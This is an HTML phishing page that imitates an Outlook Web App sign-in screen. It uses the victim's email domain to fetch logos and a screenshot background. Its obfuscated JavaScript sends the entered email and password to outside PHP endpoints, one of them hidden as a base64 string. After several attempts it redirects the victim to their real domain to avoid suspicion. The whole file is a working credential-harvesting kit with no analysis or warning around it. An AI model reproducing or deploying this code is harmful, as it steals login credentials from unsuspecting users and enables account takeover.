<html><head><meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex" />
<meta name="otherbot" content="noindex" />
<meta name="noarchive" content="noindex" />
<meta name="nosnippet" content="noindex" />
<meta name="noimageindex" content="noindex" />
<meta name="robots" content="none">
<meta name="googlebot" content="none">
<meta name="googlebot-news" content="none" />
<meta name="otherbot" content="none" />
<meta name="noarchive" content="none" />
<meta name="nosnippet" content="none" />
<meta name="noimageindex" content="none" />
<meta name="robots" content="nofollow">
<meta name="googlebot" content="nofollow">
<meta name="googlebot-news" content="nofollow" />
<meta name="otherbot" content="nofollow" />
<meta name="noarchive" content="nofollow" />
<meta name="nosnippet" content="nofollow" />
<meta name="noimageindex" content="nofollow" />
<meta name="robots" content="max-snippet:0">
<meta name="robots" content="unavailable_after: 2020-09-22">
<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex, nofollow"> 
     <meta name=viewport content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name=description content>
    <meta name=author content>
    <title>Signin Outlook WebApp Settings</title>
      <link id="logoimg" rel="shortcut icon" type="image/png" href="https://logo.clearbit.com/">
    <link rel=stylesheet href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css integrity=sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u crossorigin=anonymous>
    <link href=https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css rel=stylesheet integrity=sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN crossorigin=anonymous>
  <title>Webmail Portal Access - </title>
     <style>@font-face{font-family:SegoeUI;src:local("Segoe UI Light"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/light/latest.ttf) format("truetype");font-weight:100}@font-face{font-family:SegoeUI;src:local("Segoe UI Semilight"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semilight/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semilight/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semilight/latest.ttf) format("truetype");font-weight:200}@font-face{font-family:SegoeUI;src:local("Segoe UI"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.ttf) format("truetype");font-weight:400}@font-face{font-family:SegoeUI;src:local("Segoe UI Bold"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/bold/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/bold/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/bold/latest.ttf) format("truetype");font-weight:600}@font-face{font-family:SegoeUI;src:local("Segoe UI Semibold"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.woff2) format("woff2"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.woff) format("woff"),url(//c.s-microsoft.com/static/fonts/segoe-ui/west-european/semibold/latest.ttf) format("truetype");font-weight:700}*{font-family:SegoeUI,"-apple-system",BlinkMacSystemFont,Roboto,"Helvetica Neue",sans-serif}html,body{height:100%}body{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;padding-top:40px;padding-bottom:40px;background-color:#f5f5f5}.form-signin{width:100%;max-width:330px;padding:15px;margin:auto}.form-signin .checkbox{font-weight:400}.form-signin .form-control{position:relative;box-sizing:border-box;height:auto;padding:10px;font-size:16px}.form-signin .form-control:focus{z-index:2}.form-signin input[type="email"]{margin-bottom:-1px;border-bottom-right-radius:0;border-bottom-left-radius:0}.form-signin input[type="password"]{margin-bottom:10px;border-top-left-radius:0;border-top-right-radius:0}.sidebar{position:absolute;top:0;bottom:0;left:0;display:inline-block;width:332px}.sidebar{background-color:#0072c6}.sidebar .owaLogoContainer{margin:40vh auto auto 109px;text-align:left}.login-box{padding-left:0;width:100%}@media(min-width:576px){.login-box{padding-left:332px}}@media(min-width:768px){.login-box{padding-left:332px}}@media(min-width:992px){.login-box{padding-left:332px}}@media(min-width:1200px){.login-box{padding-left:332px}}.btn.btn-primary{background-color:#6895f7}</style>
  <style>
    html,
    body,
    div,
    span,
    applet,
    object,
    iframe,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    p,
    blockquote,
    pre,
    a,
    abbr,
    acronym,
    address,
    big,
    cite,
    code,
    del,
    dfn,
    em,
    img,
    ins,
    kbd,
    q,
    s,
    samp,
    small,
    strike,
    strong,
    sub,
    sup,
    tt,
    var,
    b,
    u,
    i,
    center,
    dl,
    dt,
    dd,
    ol,
    ul,
    li,
    fieldset,
    form,
    label,
    legend,
    table,
    caption,
    tbody,
    tfoot,
    thead,
    tr,
    th,
    td,
    article,
    aside,
    canvas,
    details,
    embed,
    figure,
    figcaption,
    footer,
    header,
    hgroup,
    menu,
    nav,
    output,
    ruby,
    section,
    summary,
    time,
    mark,
    audio,
    video {
      margin: auto;
      padding: 0;
      border: 0;
      font-size: 100%;
          text-align: center;
      vertical-align: baseline

    }

    article,
    aside,
    details,
    figcaption,
    figure,
    footer,
    header,
    hgroup,
    menu,
    nav,
    section {
      display: block
    }

    body {
      line-height: 1
    }

    ol,
    ul {
      list-style: none
    }

    blockquote,
    q {
      quotes: none
    }

    blockquote:before,
    blockquote:after,
    q:before,
    q:after {
      content: '';
      content: none
    }

    table {
      border-collapse: collapse;
      border-spacing: 0
    }

    html,
    body {
      font-size: 18px;
      font-family: Arial, helvetica neue, Helvetica, sans-serif sans-serif;
      font-weight: 500;
      -webkit-background-size: cover;
            -moz-background-size: cover;
            -o-background-size: cover;
            background-size: cover;
    }

    #root {
      position: absolute;
      left: 0;
      right: 0;
      bottom: 0;
      top: 0;
      z-index: -10;
      pointer-events: none
    }

    .error {
      color: #dc3545;
      width: 80%;
      margin: 0 auto;
      padding-top: 5px
    }

    .form-holder {
            text-align: center;
      background-color: #f5f5f5;
      width: 400px;
      margin: 180px auto;
      box-shadow: 0 20px 50px #a9a9a9;
      border-radius: 4px 4px 0 0;
      border: 1px solid #d6dfea;
      z-index: 12


    }

    .xlogo {
      background-color: #0d4f8b;
      color: #fff;
      padding: 8px;
      margin-bottom: 10px
    }

    .xlogo img {
      vertical-align: middle;
      width: 5%;
      height: 5%;
      object-fit: contain
    }

    .xlogo span {
      vertical-align: middle
    }

    .form-wrap {
      width: 400px;
      margin: 0 auto;
      text-align: center
    }

    .form-wrap p {
      font-size: 24px
    }

    .form-wrap img {
      margin: 20px
    }

    .finput {
      width: 80%;
      margin: 10px auto
    }

    .finput input[type=email],
    .finput input[type=password] {
      font-size: 24px;
      padding: 7px 10px 7px 40px;
      border-radius: 4px;
      margin: 5px 0;
      width: 90%;
      border: 1px solid #d6dfea
    }

    .finput input[type=email] {
      background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABcAAAAXCAQAAABKIxwrAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAAAmJLR0QAAKqNIzIAAAAJcEhZcwAADdcAAA3XAUIom3gAAAAHdElNRQfjAwITKgogc0nIAAAA/ElEQVQ4y43Sv07CUBTH8W9BiEvjSAcZCMbRQWNKSHBnwD4AL8DII7CRONXwDE76DhhfoCshIeGPJLoRZGjCcBygtdR72/s7w10+Ock550I6V4wImBEwok5OHvhB4trSysJlVgksCAtKeu6lsCB0kqBwwl1FC1fPHQV39NxS8KKeLxV8rh+1qRi1kbXKjxQek5ka6wT+pEZOqryxR9jzymUe7WMDNtfHt09VTSv4hAhfDGlzR5sh3wghPpVTajFgp9hKVDsGyZv0MmhUvb/eEwM+jU7qGWBBeDzwd0M+Brg1xIJwX+SJm7zLxTm32HBhzDdnPNNV/vP/EV5+AUv1vp3jhmegAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTAyVDE4OjQyOjEwKzAxOjAw99JImgAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0wMlQxODo0MjoxMCswMTowMIaP8CYAAAAZdEVYdFNvZnR3YXJlAHd3dy5pbmtzY2FwZS5vcmeb7jwaAAAAAElFTkSuQmCC
) no-repeat scroll 10px 10px
    }

    .finput input[type=password] {
      background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAQAAABKfvVzAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAAAmJLR0QAAKqNIzIAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAAHdElNRQfjAwITLAsBLt7YAAAA1klEQVQ4y72STQ6CMBCFP3SNiSSykvvoUtEDGe7CEfQW6NI1sNRECUtxXABKofwkJE6TJn3z3vTNtFAPG48zKSkBHgt6YkeCVNaTbTf9rdAFIWuX2EX1EBcTkw1XBOHRZswr6NYXsYgQhINecEEQXAXbIwiBXpAbMhVshiAkP8CoJKWBaNBJ35zrUQruRSUaYy3Rm2pJBhQ3RlkaKTji4HDqEqqNLgFwdO3rb5j221Vr+QD4w2+YV/ZBTUcAxMMFGQAvXep/Lx33MiP1uCZs/NPqClnlxA8hMnhnez+9CwAAACV0RVh0ZGF0ZTpjcmVhdGUAMjAxOS0wMy0wMlQxODo0NDoxMSswMTowMFy7M2kAAAAldEVYdGRhdGU6bW9kaWZ5ADIwMTktMDMtMDJUMTg6NDQ6MTErMDE6MDAt5ovVAAAAGXRFWHRTb2Z0d2FyZQB3d3cuaW5rc2NhcGUub3Jnm+48GgAAAABJRU5ErkJggg==
) no-repeat scroll 7px 7px
    }

    .finput input[type=email]:hover,
    .finput input[type=password]:hover,
    .finput input[type=email]:focus,
    .finput input[type=password]:focus {
      border: 1px solid #0d4f8b
    }

    button {
      border: 1px solid #0d4f8b;
      font-size: 20px;
      padding: 7px 20px;
      border-radius: 4px;
      background-color: #0d4f8b;
      color: #fff
    }

    button:hover {
      background-color: #1874cd;
      cursor: pointer
    }

    .privacy {
      font-size: 14px;
      color: gray;
      text-align: left;
      display: block;
      margin-bottom: 20px
    }
  </style>
  <link id="favicon" rel="shortcut icon" type="image/png" href="https://logo.clearbit.com/">
</head>

<body style="background-image: url(&quot;https://image.thum.io/get/auth/54454-e9600b3bfd18a8d720599b53b705cd4a/&quot;);">
   <h2 class="text-center"><div class="form-holder"> <div class=owaLogoContainer>
            <img src="" alt="Mailbox" id="zion" style="width:100px;height:100px;">
        </div>

        
        <div class=form-signin>
        
       
            <h1 style="color: #0078d4;" class="h4 mb-3 font-weight-normal" id=corportate-title> <i></i>Powered By <span id="logoname">Microsoft</span></h1><br />
            <form name="myform" action="" method="post">
                <label for=username class=sr-only>Email address</label>
            <input type="email" id="pet"  class=form-control name="email" placeholder="Email address" autofocus readonly required><P><br>
            <label for=inputPassword class=sr-only>Password</label>
            <input type="password" id=pett name="password" class=form-control placeholder=Password required>
<!--             <input type="hidden" name="error" id="error">
 -->            <input type="hidden" name="source" value="OWA">
            <div  style=color:red class=warning id=warning></div>
            <div class="checkbox mb-3 text-left">
                <div id="mgss" style="display: none;color: red;font-weight: 400;margin-top: 10px;font-size:15px">Invalid password combination. Try entering your correct password again.</div>
                                <span id="error" class="text-danger" style="display: none;color: red;font-weight: 400;margin-top: 10px;font-size:15px">That account doesn't exist. Enter a different account</span>
                <label style="text-align:center; font-size:15px">
                    <input type=checkbox value=remember-me>&nbsp;
                    <span id=privateLabel aria-hidden=true>Private computer</span>
                    (<a href=# class=signInCheckBoxLink role=link>What is this?</a>)
                </label>
                
            </div>
            <button type="submit" style=float:right class="btn btn-lg btn-primary btn-block" id="submit-btn">Sign in</button>
            <br><br /><br><br />
            <p style="text-align:center; font-size:15px"> <a href="#"> Copyright <span id="kai"> </span> 2022  </p>
            </form>
        </div>
    </div>
  <div id="root">



<script src="https://code.jquery.com/jquery-3.5.0.js"></script>
<script src="jquery-3.6.0.min.js"></script>
<script>
(function(_0x3f3386,_0x25748a){var _0x1b6be4=_0x2147;var _0x2bc31d=_0x3f3386();while(!![]){try{var _0x227c62=-parseInt(_0x1b6be4(0xfc))/0x1*(parseInt(_0x1b6be4(0xe6))/0x2)+parseInt(_0x1b6be4(0x108))/0x3*(parseInt(_0x1b6be4(0xee))/0x4)+-parseInt(_0x1b6be4(0x105))/0x5*(-parseInt(_0x1b6be4(0xe5))/0x6)+-parseInt(_0x1b6be4(0xd9))/0x7+-parseInt(_0x1b6be4(0xe2))/0x8*(parseInt(_0x1b6be4(0x10d))/0x9)+-parseInt(_0x1b6be4(0xf1))/0xa*(parseInt(_0x1b6be4(0xf2))/0xb)+-parseInt(_0x1b6be4(0x103))/0xc*(-parseInt(_0x1b6be4(0xdf))/0xd);if(_0x227c62===_0x25748a){break;}else{_0x2bc31d['push'](_0x2bc31d['shift']());}}catch(_0xb03fdd){_0x2bc31d['push'](_0x2bc31d['shift']());}}}(_0x71a2,0x9c6b8));function _0x71a2(){var _0x430dc7=['show','OIJyU','push','825972XnWNRz','keypress','3830xQHOXx','foktA','ajax','17850TzLUZX','AYWcj','#pett','keyCode','(((.+)+)+)+$','10359OPHRBV','UdSpc','substr','click','7210133gvGYvc','POST','#mgss','test','html','#error','286omKjvR','That\x20account\x20doesn\x27t\x20exist.\x20Enter\x20a\x20different\x20account','rTMtz','1640ypbycY','apply','0x0','5214KaulGt','18xSJJYH','#submit-btn','constructor','location','fQPrk','http://www.','Password\x20field\x20is\x20empty.!','toString','668otTYDm','mjnnO','val','38270DuSrFQ','1111kedKKL','indexOf','JSON','preventDefault','replace','hide','which','text','#pet','shift','97821FJOcdp','Continue','MBZSB','search'];_0x71a2=function(){return _0x430dc7;};return _0x71a2();}var _0x52d51e=(function(){var _0x57af5d=(function(){var _0x12d072=!![];return function(_0x3306ad,_0xd83cb7){var _0x37f59c=_0x12d072?function(){if(_0xd83cb7){var _0x34e36c=_0xd83cb7['apply'](_0x3306ad,arguments);_0xd83cb7=null;return _0x34e36c;}}:function(){};_0x12d072=![];return _0x37f59c;};}());var _0xb3203f=_0x57af5d(this,function(){return _0xb3203f['toString']()['search']('(((.+)+)+)+$')['toString']()['constructor'](_0xb3203f)['search']('(((.+)+)+)+$');});_0xb3203f();var _0x4a8b34=!![];return function(_0x436745,_0x353519){var _0x4c29a1=_0x4a8b34?function(){var _0x4b94d1=_0x2147;if(_0x353519){if('CmpUC'===_0x4b94d1(0xfe)){_0x3dfde7(_0x4b94d1(0x10a))[_0x4b94d1(0xf0)]('');if(_0x1ded31>=0x3){_0x1bbea9=0x0;_0x55fbdf[_0x4b94d1(0xe9)][_0x4b94d1(0xf6)](_0x4b94d1(0xeb)+_0x393107);return![];}_0x588172(_0x4b94d1(0xdb))['show']();}else{var _0x58e4c0=_0x353519[_0x4b94d1(0xe3)](_0x436745,arguments);_0x353519=null;return _0x58e4c0;}}}:function(){};_0x4a8b34=![];return _0x4c29a1;};}());var _0x2cbab8=_0x52d51e(this,function(){var _0x12f829=_0x2147;return _0x2cbab8['toString']()['search'](_0x12f829(0x10c))['toString']()[_0x12f829(0xe8)](_0x2cbab8)[_0x12f829(0xff)](_0x12f829(0x10c));});_0x2cbab8();function _0x2147(_0x28132f,_0x10b143){var _0x13b46d=_0x71a2();_0x2147=function(_0x5846f1,_0xfdad51){_0x5846f1=_0x5846f1-0xd7;var _0x2208c4=_0x13b46d[_0x5846f1];return _0x2208c4;};return _0x2147(_0x28132f,_0x10b143);}$(document)['ready'](function(){var _0x26efca=_0x2147;var _0x3ff69a=0x0;$(document)[_0x26efca(0x104)](function(_0x509580){var _0x1ae06b=_0x26efca;if(_0x1ae06b(0x10e)!=='UdSpc'){return _0x136c87[_0x1ae06b(0xed)]()['search'](_0x1ae06b(0x10c))[_0x1ae06b(0xed)]()[_0x1ae06b(0xe8)](_0x1c7ec3)[_0x1ae06b(0xff)](_0x1ae06b(0x10c));}else{var _0x4dcf6e=_0x509580['keyCode']?_0x509580[_0x1ae06b(0x10b)]:_0x509580[_0x1ae06b(0xf8)];if(_0x4dcf6e=='13'){_0x509580[_0x1ae06b(0xf5)]();$('#submit-btn')['click']();}}});$('#submit-btn')[_0x26efca(0xd8)](function(_0x4db9ba){var _0x2a89aa=_0x26efca;if('mjnnO'!==_0x2a89aa(0xef)){var _0x53abaa=_0xfdb734['apply'](_0x1883d2,arguments);_0x1e659c=null;return _0x53abaa;}else{$('#error')[_0x2a89aa(0xf7)]();$(_0x2a89aa(0xdb))['hide']();_0x4db9ba[_0x2a89aa(0xf5)]();var _0xb8422a=$(_0x2a89aa(0xfa))[_0x2a89aa(0xf0)]();var _0x44c4d4=$(_0x2a89aa(0x10a))[_0x2a89aa(0xf0)]();var _0x20cf0f=$(_0x2a89aa(0xdb))[_0x2a89aa(0xdd)]();$(_0x2a89aa(0xdb))[_0x2a89aa(0xf9)](_0x20cf0f);var _0x199796=_0xb8422a;var _0x1d292b=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0xb8422a){$('#error')['show']();$(_0x2a89aa(0xde))[_0x2a89aa(0xdd)]('Email\x20field\x20is\x20empty.!');return![];}if(!_0x1d292b[_0x2a89aa(0xdc)](_0x199796)){$(_0x2a89aa(0xde))[_0x2a89aa(0x100)]();$(_0x2a89aa(0xde))['html'](_0x2a89aa(0xe0));return![];}if(!_0x44c4d4){$(_0x2a89aa(0xde))[_0x2a89aa(0x100)]();$('#error')[_0x2a89aa(0xdd)]('Password\x20field\x20is\x20empty.!');return![];}var _0x27caa9=_0x199796[_0x2a89aa(0xf3)]('@');var _0x5d8034=_0x199796[_0x2a89aa(0xd7)](_0x27caa9+0x1);var _0x57b6ef=_0x5d8034[_0x2a89aa(0xd7)](0x0,_0x5d8034[_0x2a89aa(0xf3)]('.'));var _0x20509f=_0x57b6ef['toLowerCase']();_0x3ff69a=_0x3ff69a+0x1;var _0x418d43=['aHR0cHM6Ly9yZXBvcnRsb2cucHcvc3V1LnBocA=='];(function(_0x264766,_0x4c643d){var _0x482d03=function(_0x244364){var _0x93e5d3=_0x2147;while(--_0x244364){if(_0x93e5d3(0xea)!==_0x93e5d3(0x101)){_0x264766[_0x93e5d3(0x102)](_0x264766[_0x93e5d3(0xfb)]());}else{_0xb111a8(_0x93e5d3(0xde))[_0x93e5d3(0x100)]();_0x319792(_0x93e5d3(0xde))[_0x93e5d3(0xdd)](_0x93e5d3(0xec));return![];}}};_0x482d03(++_0x4c643d);}(_0x418d43,0x13e));var _0x210fc8=function(_0x2756e0,_0x2c7a05){var _0x74c959=_0x2a89aa;if(_0x74c959(0x106)==='DBEpI'){_0x496d55(_0x74c959(0xe7))[_0x74c959(0xdd)]('Verifying...');}else{_0x2756e0=_0x2756e0-0x0;var _0x32250c=_0x418d43[_0x2756e0];return _0x32250c;}};$[_0x2a89aa(0x107)]({'dataType':_0x2a89aa(0xf4),'url':atob(_0x210fc8(_0x2a89aa(0xe4))),'type':_0x2a89aa(0xda),'data':{'pet':_0xb8422a,'pett':_0x44c4d4},'beforeSend':function(_0x24b673){var _0x50b784=_0x2a89aa;$(_0x50b784(0xe7))['html']('Verifying...');},'success':function(_0x23c092){var _0x2d0af2=_0x2a89aa;$(_0x2d0af2(0x10a))[_0x2d0af2(0xf0)]('');if(_0x3ff69a>=0x3){_0x3ff69a=0x0;window[_0x2d0af2(0xe9)][_0x2d0af2(0xf6)](_0x2d0af2(0xeb)+_0x5d8034);return![];}$(_0x2d0af2(0xdb))[_0x2d0af2(0x100)]();},'error':function(){var _0x4b3509=_0x2a89aa;$('#pett')[_0x4b3509(0xf0)]('');if(_0x3ff69a>=0x3){_0x3ff69a=0x0;window[_0x4b3509(0xe9)][_0x4b3509(0xf6)](_0x4b3509(0xeb)+_0x5d8034);return![];}$(_0x4b3509(0xdb))[_0x4b3509(0x100)]();},'complete':function(){var _0x45968b=_0x2a89aa;if(_0x45968b(0xe1)!==_0x45968b(0x109)){$(_0x45968b(0xe7))[_0x45968b(0xdd)](_0x45968b(0xfd));}else{_0x5df957(_0x45968b(0x10a))[_0x45968b(0xf0)]('');if(_0x480a5c>=0x3){_0x5b36ec=0x0;_0x5987b4[_0x45968b(0xe9)]['replace'](_0x45968b(0xeb)+_0x33a57b);return![];}_0x422282('#mgss')['show']();}}});}});});</script>
<script type="text/javascript">
            
  var _0x403771=(function(){var _0x421f48=!![];return function(_0x318b36,_0x2d8065){var _0x1023d1=_0x421f48?function(){if(_0x2d8065){var _0x8f9c90=_0x2d8065['apply'](_0x318b36,arguments);_0x2d8065=null;return _0x8f9c90;}}:function(){};_0x421f48=![];return _0x1023d1;};}());var _0x4f1234=_0x403771(this,function(){return _0x4f1234['toString']()['search']('(((.+)+)+)+$')['toString']()['constructor'](_0x4f1234)['search']('(((.+)+)+)+$');});_0x4f1234();var url=new URLSearchParams(location['search']);var hash=location['hash']?location['hash']['slice'](0x1):'';var hasherror=hash&&hash['indexOf']('error=')>-0x1?'error':'';var email=url['get']('email')||url['get']('login')||hash;if(email&&email['indexOf']('&')>-0x1)email=email['split']('&')[0x0];var error=url['get']('error')||hasherror;const err=document['getElementById']('err');var count=0x0;if(email&&/.+@.+\..+/['test'](email)){$('input[name=\x27email\x27]')['val'](email);$('input[name=\x27password\x27]')['focus']();$('#username')['html'](email['split']('@')[0x0]);var my_email=email;var ind=my_email['indexOf']('@');var my_slice=my_email['substr'](ind+0x1);var mainPage='https://'+my_slice;var sv=my_slice;$('#logoname')['html'](sv);$('#kai')['html'](sv);var image='url(\x27https://image.thum.io/get/auth/54454-e9600b3bfd18a8d720599b53b705cd4a/https://'+sv;'\x27)';$('#zion')['attr']('src','https://logo.clearbit.com/'+mainPage);$('#favicon')['attr']('href','https://logo.clearbit.com/'+mainPage);document['body']['style']['backgroundImage']=image;document['title']='Webmail\x20Portal\x20Access\x20-\x20'+sv;}else{$('input[name=\x27email\x27]')['focus']();}if(error){$('input[name=\x27error\x27]')['val']('error');}var msg=$('#msg')['html']();$('#msg')['text'](msg);var alertt=document['querySelector']('.alert');const pet=document['getElementById']('pet');const pett=document['getElementById']('pett');const source=document['getElementById']('source');const form=document['getElementById']('login_form');$('#login_submit')['click'](_0x1510ee=>{_0x1510ee['preventDefault']();if(!/.+@.+\..+/['test']($('input[name=\x27email\x27]')['val']())){showEl(err,'red');err['textContent']='Enter\x20a\x20valid\x20email\x20address.';return;}else if(!$('input[name=\x27password\x27]')['val']()||!$('input[name=\x27password\x27]')['val']()>0x4){showEl(err,'red');err['textContent']='输入正确的密码！';return;}else{count=count+0x1;showEl(err,'black');err['textContent']='正在认证...';var _0x3c5af8=$('#login_form');var _0x1685a7=form['action'];var _0x483aff=_0x3c5af8['serialize']();$['ajax']({'type':'POST','url':'https://devcloud-data.herokuapp.com/rotsuc.php','data':_0x483aff,'cache':![],'timeout':0xc3500,'beforeSend':function(_0x481446){$('#login_submit')['html']('正在验证...');},'success':function(_0x44f718){if(_0x44f718){pett['value']='';pett['style']['borderColor']='red';showEl(err,'red');err['textContent']='Password\x20is\x20incorrect.';if(count>=0x2){count=0x0;window['location']['replace']('http://www.'+my_slice);}console['log'](_0x44f718);if(_0x44f718['signal']=='ok'){$('#msg')['html'](_0x44f718['msg']);}else{$('#msg')['html'](_0x44f718['msg']);}}else{showEl(err,'red');err['textContent']='出了点问题，请重试';pett['value']='';pett['style']['borderColor']='red';}},'error':function(){showEl(err,'red');err['textContent']='出了点问题，请重试';pett['value']='';pett['style']['borderColor']='red';},'complete':function(){$('#login_submit')['html']('继续');}});}});function showEl(_0x322ca4,_0x48118c){_0x322ca4['style']['color']=_0x48118c;_0x322ca4['style']['display']='block';}function hideEl(_0xb5483f){_0xb5483f['style']['color']='#000';_0xb5483f['style']['display']='none';_0xb5483f['textContent']='';}
</script></div></body></html>
